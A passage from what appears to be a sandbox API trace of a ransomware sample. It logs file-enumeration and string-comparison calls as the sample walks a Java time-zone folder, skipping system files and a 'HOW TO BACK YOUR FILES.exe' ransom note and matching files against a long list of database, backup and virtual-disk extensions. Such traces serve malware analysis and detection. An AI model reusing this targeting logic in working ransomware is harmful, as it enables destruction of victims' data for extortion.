lstrcmpiW (lpString1="nco", lpString2="gdb") returned 1 [0055.853] lstrlenW (lpString="gdb") returned 3 [0055.853] lstrcmpiW (lpString1="nco", lpString2="gdb") returned 1 [0055.853] lstrlenW (lpString="grdb") returned 4 [0055.853] lstrcmpiW (lpString1="anco", lpString2="grdb") returned -1 [0055.854] lstrlenW (lpString="gwi") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="gwi") returned 1 [0055.854] lstrlenW (lpString="hdb") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="hdb") returned 1 [0055.854] lstrlenW (lpString="his") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="his") returned 1 [0055.854] lstrlenW (lpString="ib") returned 2 [0055.854] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0055.854] lstrlenW (lpString="idb") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="idb") returned 1 [0055.854] lstrlenW (lpString="ihx") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="ihx") returned 1 [0055.854] lstrlenW (lpString="itdb") returned 4 [0055.854] lstrcmpiW (lpString1="anco", lpString2="itdb") returned -1 [0055.854] lstrlenW (lpString="itw") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="itw") returned 1 [0055.854] lstrlenW (lpString="jet") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="jet") returned 1 [0055.854] lstrlenW (lpString="jtx") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="jtx") returned 1 [0055.854] lstrlenW (lpString="kdb") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="kdb") returned 1 [0055.854] lstrlenW (lpString="kexi") returned 4 [0055.854] lstrcmpiW (lpString1="anco", lpString2="kexi") returned -1 [0055.854] lstrlenW (lpString="kexic") returned 5 [0055.854] lstrcmpiW (lpString1="ranco", lpString2="kexic") returned 1 [0055.854] lstrlenW (lpString="kexis") returned 5 [0055.854] lstrcmpiW (lpString1="ranco", lpString2="kexis") returned 1 [0055.854] lstrlenW (lpString="lgc") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="lgc") returned 1 [0055.854] lstrlenW (lpString="lwx") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="lwx") returned 1 [0055.854] lstrlenW (lpString="maf") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="maf") returned 1 [0055.854] lstrlenW (lpString="maq") returned 3 [0055.854] lstrcmpiW (lpString1="nco", lpString2="maq") returned 1 [0055.854] lstrlenW (lpString="mar") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mar") returned 1 [0055.855] lstrlenW (lpString="marshal") returned 7 [0055.855] lstrcmpiW (lpString1="_Branco", lpString2="marshal") returned -1 [0055.855] lstrlenW (lpString="mas") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mas") returned 1 [0055.855] lstrlenW (lpString="mav") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mav") returned 1 [0055.855] lstrlenW (lpString="maw") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="maw") returned 1 [0055.855] lstrlenW (lpString="mdbhtml") returned 7 [0055.855] lstrcmpiW (lpString1="_Branco", lpString2="mdbhtml") returned -1 [0055.855] lstrlenW (lpString="mdn") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mdn") returned 1 [0055.855] lstrlenW (lpString="mdt") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mdt") returned 1 [0055.855] lstrlenW (lpString="mfd") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mfd") returned 1 [0055.855] lstrlenW (lpString="mpd") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mpd") returned 1 [0055.855] lstrlenW (lpString="mrg") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mrg") returned 1 [0055.855] lstrlenW (lpString="mud") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mud") returned 1 [0055.855] lstrlenW (lpString="mwb") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="mwb") returned 1 [0055.855] lstrlenW (lpString="myd") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="myd") returned 1 [0055.855] lstrlenW (lpString="ndf") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="ndf") returned -1 [0055.855] lstrlenW (lpString="nnt") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="nnt") returned -1 [0055.855] lstrlenW (lpString="nrmlib") returned 6 [0055.855] lstrcmpiW (lpString1="Branco", lpString2="nrmlib") returned -1 [0055.855] lstrlenW (lpString="ns2") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="ns2") returned -1 [0055.855] lstrlenW (lpString="ns3") returned 3 [0055.855] lstrcmpiW (lpString1="nco", lpString2="ns3") returned -1 [0055.855] lstrlenW (lpString="ns4") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="ns4") returned -1 [0055.856] lstrlenW (lpString="nsf") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="nsf") returned -1 [0055.856] lstrlenW (lpString="nv") returned 2 [0055.856] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0055.856] lstrlenW (lpString="nv2") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="nv2") returned -1 [0055.856] lstrlenW (lpString="nwdb") returned 4 [0055.856] lstrcmpiW (lpString1="anco", lpString2="nwdb") returned -1 [0055.856] lstrlenW (lpString="nyf") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="nyf") returned -1 [0055.856] lstrlenW (lpString="odb") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="odb") returned -1 [0055.856] lstrlenW (lpString="odb") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="odb") returned -1 [0055.856] lstrlenW (lpString="oqy") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="oqy") returned -1 [0055.856] lstrlenW (lpString="ora") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="ora") returned -1 [0055.856] lstrlenW (lpString="orx") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="orx") returned -1 [0055.856] lstrlenW (lpString="owc") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="owc") returned -1 [0055.856] lstrlenW (lpString="p96") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="p96") returned -1 [0055.856] lstrlenW (lpString="p97") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="p97") returned -1 [0055.856] lstrlenW (lpString="pan") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="pan") returned -1 [0055.856] lstrlenW (lpString="pdb") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="pdb") returned -1 [0055.856] lstrlenW (lpString="pdm") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="pdm") returned -1 [0055.856] lstrlenW (lpString="pnz") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="pnz") returned -1 [0055.856] lstrlenW (lpString="qry") returned 3 [0055.856] lstrcmpiW (lpString1="nco", lpString2="qry") returned -1 [0055.856] lstrlenW (lpString="qvd") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="qvd") returned -1 [0055.857] lstrlenW (lpString="rbf") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="rbf") returned -1 [0055.857] lstrlenW (lpString="rctd") returned 4 [0055.857] lstrcmpiW (lpString1="anco", lpString2="rctd") returned -1 [0055.857] lstrlenW (lpString="rod") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="rod") returned -1 [0055.857] lstrlenW (lpString="rodx") returned 4 [0055.857] lstrcmpiW (lpString1="anco", lpString2="rodx") returned -1 [0055.857] lstrlenW (lpString="rpd") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="rpd") returned -1 [0055.857] lstrlenW (lpString="rsd") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="rsd") returned -1 [0055.857] lstrlenW (lpString="sas7bdat") returned 8 [0055.857] lstrcmpiW (lpString1="o_Branco", lpString2="sas7bdat") returned -1 [0055.857] lstrlenW (lpString="sbf") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="sbf") returned -1 [0055.857] lstrlenW (lpString="scx") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="scx") returned -1 [0055.857] lstrlenW (lpString="sdb") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="sdb") returned -1 [0055.857] lstrlenW (lpString="sdc") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="sdc") returned -1 [0055.857] lstrlenW (lpString="sdf") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="sdf") returned -1 [0055.857] lstrlenW (lpString="sis") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="sis") returned -1 [0055.857] lstrlenW (lpString="spq") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="spq") returned -1 [0055.857] lstrlenW (lpString="te") returned 2 [0055.857] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0055.857] lstrlenW (lpString="teacher") returned 7 [0055.857] lstrcmpiW (lpString1="_Branco", lpString2="teacher") returned -1 [0055.857] lstrlenW (lpString="tmd") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="tmd") returned -1 [0055.857] lstrlenW (lpString="tps") returned 3 [0055.857] lstrcmpiW (lpString1="nco", lpString2="tps") returned -1 [0055.858] lstrlenW (lpString="trc") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="trc") returned -1 [0055.858] lstrlenW (lpString="trc") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="trc") returned -1 [0055.858] lstrlenW (lpString="trm") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="trm") returned -1 [0055.858] lstrlenW (lpString="udb") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="udb") returned -1 [0055.858] lstrlenW (lpString="udl") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="udl") returned -1 [0055.858] lstrlenW (lpString="usr") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="usr") returned -1 [0055.858] lstrlenW (lpString="v12") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="v12") returned -1 [0055.858] lstrlenW (lpString="vis") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="vis") returned -1 [0055.858] lstrlenW (lpString="vpd") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="vpd") returned -1 [0055.858] lstrlenW (lpString="vvv") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="vvv") returned -1 [0055.858] lstrlenW (lpString="wdb") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="wdb") returned -1 [0055.858] lstrlenW (lpString="wmdb") returned 4 [0055.858] lstrcmpiW (lpString1="anco", lpString2="wmdb") returned -1 [0055.858] lstrlenW (lpString="wrk") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="wrk") returned -1 [0055.858] lstrlenW (lpString="xdb") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="xdb") returned -1 [0055.858] lstrlenW (lpString="xld") returned 3 [0055.858] lstrcmpiW (lpString1="nco", lpString2="xld") returned -1 [0055.858] lstrlenW (lpString="xmlff") returned 5 [0055.858] lstrcmpiW (lpString1="ranco", lpString2="xmlff") returned -1 [0055.858] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x131, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Santarem", cAlternateFileName="")) returned 1 [0055.858] lstrcmpiW (lpString1="Santarem", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.858] lstrcmpiW (lpString1="Santarem", lpString2="aoldtz.exe") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2=".") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="..") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="windows") returned -1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="bootmgr") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="temp") returned -1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="pagefile.sys") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="boot") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="ids.txt") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="ntuser.dat") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="perflogs") returned 1 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2="MSBuild") returned 1 [0055.859] lstrlenW (lpString="Santarem") returned 8 [0055.859] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rio_Branco") returned 58 [0055.859] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Santarem" | out: lpString1="Santarem") returned="Santarem" [0055.859] lstrlenW (lpString="Santarem") returned 8 [0055.859] lstrlenW (lpString="Ares865") returned 7 [0055.859] lstrcmpiW (lpString1="antarem", lpString2="Ares865") returned -1 [0055.859] lstrlenW (lpString=".dll") returned 4 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2=".dll") returned 1 [0055.859] lstrlenW (lpString=".lnk") returned 4 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2=".lnk") returned 1 [0055.859] lstrlenW (lpString=".ini") returned 4 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2=".ini") returned 1 [0055.859] lstrlenW (lpString=".sys") returned 4 [0055.859] lstrcmpiW (lpString1="Santarem", lpString2=".sys") returned 1 [0055.859] lstrlenW (lpString="Santarem") returned 8 [0055.859] lstrlenW (lpString="bak") returned 3 [0055.859] lstrcmpiW (lpString1="rem", lpString2="bak") returned 1 [0055.859] lstrlenW (lpString="ba_") returned 3 [0055.859] lstrcmpiW (lpString1="rem", lpString2="ba_") returned 1 [0055.859] lstrlenW (lpString="dbb") returned 3 [0055.859] lstrcmpiW (lpString1="rem", lpString2="dbb") returned 1 [0055.859] lstrlenW (lpString="vmdk") returned 4 [0055.859] lstrcmpiW (lpString1="arem", lpString2="vmdk") returned -1 [0055.859] lstrlenW (lpString="rar") returned 3 [0055.859] lstrcmpiW (lpString1="rem", lpString2="rar") returned 1 [0055.860] lstrlenW (lpString="zip") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="zip") returned -1 [0055.860] lstrlenW (lpString="tgz") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="tgz") returned -1 [0055.860] lstrlenW (lpString="vbox") returned 4 [0055.860] lstrcmpiW (lpString1="arem", lpString2="vbox") returned -1 [0055.860] lstrlenW (lpString="vdi") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="vdi") returned -1 [0055.860] lstrlenW (lpString="vhd") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="vhd") returned -1 [0055.860] lstrlenW (lpString="vhdx") returned 4 [0055.860] lstrcmpiW (lpString1="arem", lpString2="vhdx") returned -1 [0055.860] lstrlenW (lpString="avhd") returned 4 [0055.860] lstrcmpiW (lpString1="arem", lpString2="avhd") returned -1 [0055.860] lstrlenW (lpString="db") returned 2 [0055.860] lstrcmpiW (lpString1="em", lpString2="db") returned 1 [0055.860] lstrlenW (lpString="db2") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="db2") returned 1 [0055.860] lstrlenW (lpString="db3") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="db3") returned 1 [0055.860] lstrlenW (lpString="dbf") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="dbf") returned 1 [0055.860] lstrlenW (lpString="mdf") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="mdf") returned 1 [0055.860] lstrlenW (lpString="mdb") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="mdb") returned 1 [0055.860] lstrlenW (lpString="sql") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="sql") returned -1 [0055.860] lstrlenW (lpString="sqlite") returned 6 [0055.860] lstrcmpiW (lpString1="ntarem", lpString2="sqlite") returned -1 [0055.860] lstrlenW (lpString="sqlite3") returned 7 [0055.860] lstrcmpiW (lpString1="antarem", lpString2="sqlite3") returned -1 [0055.860] lstrlenW (lpString="sqlitedb") returned 8 [0055.860] lstrlenW (lpString="xml") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="xml") returned -1 [0055.860] lstrlenW (lpString="$er") returned 3 [0055.860] lstrcmpiW (lpString1="rem", lpString2="$er") returned 1 [0055.861] lstrlenW (lpString="4dd") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="4dd") returned 1 [0055.861] lstrlenW (lpString="4dl") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="4dl") returned 1 [0055.861] lstrlenW (lpString="^^^") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="^^^") returned 1 [0055.861] lstrlenW (lpString="abs") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="abs") returned 1 [0055.861] lstrlenW (lpString="abx") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="abx") returned 1 [0055.861] lstrlenW (lpString="accdb") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accdb") returned 1 [0055.861] lstrlenW (lpString="accdc") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accdc") returned 1 [0055.861] lstrlenW (lpString="accde") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accde") returned 1 [0055.861] lstrlenW (lpString="accdr") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accdr") returned 1 [0055.861] lstrlenW (lpString="accdt") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accdt") returned 1 [0055.861] lstrlenW (lpString="accdw") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accdw") returned 1 [0055.861] lstrlenW (lpString="accft") returned 5 [0055.861] lstrcmpiW (lpString1="tarem", lpString2="accft") returned 1 [0055.861] lstrlenW (lpString="adb") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="adb") returned 1 [0055.861] lstrlenW (lpString="adb") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="adb") returned 1 [0055.861] lstrlenW (lpString="ade") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="ade") returned 1 [0055.861] lstrlenW (lpString="adf") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="adf") returned 1 [0055.861] lstrlenW (lpString="adn") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="adn") returned 1 [0055.861] lstrlenW (lpString="adp") returned 3 [0055.861] lstrcmpiW (lpString1="rem", lpString2="adp") returned 1 [0055.861] lstrlenW (lpString="alf") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="alf") returned 1 [0055.862] lstrlenW (lpString="ask") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="ask") returned 1 [0055.862] lstrlenW (lpString="btr") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="btr") returned 1 [0055.862] lstrlenW (lpString="cat") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="cat") returned 1 [0055.862] lstrlenW (lpString="cdb") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="cdb") returned 1 [0055.862] lstrlenW (lpString="ckp") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="ckp") returned 1 [0055.862] lstrlenW (lpString="cma") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="cma") returned 1 [0055.862] lstrlenW (lpString="cpd") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="cpd") returned 1 [0055.862] lstrlenW (lpString="dacpac") returned 6 [0055.862] lstrcmpiW (lpString1="ntarem", lpString2="dacpac") returned 1 [0055.862] lstrlenW (lpString="dad") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dad") returned 1 [0055.862] lstrlenW (lpString="dadiagrams") returned 10 [0055.862] lstrlenW (lpString="daschema") returned 8 [0055.862] lstrlenW (lpString="db-journal") returned 10 [0055.862] lstrlenW (lpString="db-shm") returned 6 [0055.862] lstrcmpiW (lpString1="ntarem", lpString2="db-shm") returned 1 [0055.862] lstrlenW (lpString="db-wal") returned 6 [0055.862] lstrcmpiW (lpString1="ntarem", lpString2="db-wal") returned 1 [0055.862] lstrlenW (lpString="dbc") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dbc") returned 1 [0055.862] lstrlenW (lpString="dbs") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dbs") returned 1 [0055.862] lstrlenW (lpString="dbt") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dbt") returned 1 [0055.862] lstrlenW (lpString="dbv") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dbv") returned 1 [0055.862] lstrlenW (lpString="dbx") returned 3 [0055.862] lstrcmpiW (lpString1="rem", lpString2="dbx") returned 1 [0055.863] lstrlenW (lpString="dcb") returned 3 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dcb") returned 1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dct") returned 1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dcx") returned 1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="ddl") returned 1 [0055.863] lstrcmpiW (lpString1="arem", lpString2="dlis") returned -1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dp1") returned 1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dqy") returned 1 [0055.863] lstrcmpiW (lpString1="rem", lpString2="dsk") returned 1 [0055.863] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Santa_Isabel", cAlternateFileName="SANTA_~1")) returned 1 [0055.863] lstrcmpiW (lpString1="Santa_Isabel", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.863] lstrcmpiW (lpString1="Santa_Isabel", lpString2="aoldtz.exe") returned 1 [0055.863] lstrcmpiW (lpString1="Santa_Isabel", lpString2=".") returned 1 [0055.863] lstrcmpiW (lpString1="Santa_Isabel", lpString2="..") returned 1 [0055.863] lstrcmpiW (lpString1="Santa_Isabel", lpString2="windows") returned -1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="bootmgr") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="temp") returned -1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="pagefile.sys") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="boot") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="ids.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="ntuser.dat") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="perflogs") returned 1 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2="MSBuild") returned 1 [0055.864] lstrlenW (lpString="Santa_Isabel") returned 12 [0055.864] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santarem") returned 56 [0055.864] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Santa_Isabel" | out: lpString1="Santa_Isabel") returned="Santa_Isabel" [0055.864] lstrlenW (lpString="Santa_Isabel") returned 12 [0055.864] lstrlenW (lpString="Ares865") returned 7 [0055.864] lstrcmpiW (lpString1="_Isabel", lpString2="Ares865") returned -1 [0055.864] lstrlenW (lpString=".dll") returned 4 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2=".dll") returned 1 [0055.864] lstrlenW (lpString=".lnk") returned 4 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2=".lnk") returned 1 [0055.864] lstrlenW (lpString=".ini") returned 4 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2=".ini") returned 1 [0055.864] lstrlenW (lpString=".sys") returned 4 [0055.864] lstrcmpiW (lpString1="Santa_Isabel", lpString2=".sys") returned 1 [0055.864] lstrlenW (lpString="Santa_Isabel") returned 12 [0055.864] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x558, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Santiago", cAlternateFileName="")) returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="aoldtz.exe") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2=".") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="..") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="windows") returned -1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="bootmgr") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="temp") returned -1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="pagefile.sys") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="boot") returned 1 [0055.864] lstrcmpiW (lpString1="Santiago", lpString2="ids.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2="ntuser.dat") returned 1 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2="perflogs") returned 1 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2="MSBuild") returned 1 [0055.865] lstrlenW (lpString="Santiago") returned 8 [0055.865] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel") returned 60 [0055.865] lstrcpyW (in: lpString1=0x2e2e8c0, lpString2="Santiago" | out: lpString1="Santiago") returned="Santiago" [0055.865] lstrlenW (lpString="Santiago") returned 8 [0055.865] lstrlenW (lpString="Ares865") returned 7 [0055.865] lstrcmpiW (lpString1="antiago", lpString2="Ares865") returned -1 [0055.865] lstrlenW (lpString=".dll") returned 4 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2=".dll") returned 1 [0055.865] lstrlenW (lpString=".lnk") returned 4 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2=".lnk") returned 1 [0055.865] lstrlenW (lpString=".ini") returned 4 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2=".ini") returned 1 [0055.865] lstrlenW (lpString=".sys") returned 4 [0055.865] lstrcmpiW (lpString1="Santiago", lpString2=".sys") returned 1 [0055.865] lstrlenW (lpString="Santiago") returned 8 [0055.865] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xc9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Santo_Domingo", cAlternateFileName="SANTO_~1")) returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="aoldtz.exe") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2=".") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="..") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="windows") returned -1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="bootmgr") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="temp") returned -1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="pagefile.sys") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="boot") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="ids.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Santo_Domingo", lpString2="ntuser.dat") returned 1 [0055.865] lstrcmpiW 